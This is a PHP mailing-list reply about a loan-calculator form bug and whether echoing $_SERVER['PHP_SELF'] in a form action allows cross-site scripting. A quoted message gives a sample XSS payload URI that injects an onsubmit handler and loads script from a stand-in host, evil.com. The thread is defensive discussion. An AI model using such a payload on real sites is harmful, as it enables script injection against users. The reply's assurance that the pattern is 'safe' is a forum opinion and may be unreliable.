Hi Jochem,

Jochem Maas wrote:
Op 3/10/10 6:23 PM, Joseph Thayne schreef:
Looks to me like you are closing your form before you put anything in
it.  Therefore, the loan_amount is not set making the value 0.  Follow
the math, and you are dividing by 1-1.

Change this line:

<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>


<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">

this is a XSS waiting to happen. I can put something like the following in
the request uri:

index.php?" onsubmit="evil()"><script src="http://www.evil.com/evi.js";></script>

Apparently it's not going to work. PHP_SELF does not include query string. So it is safe to use it this way.


PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Reply via email to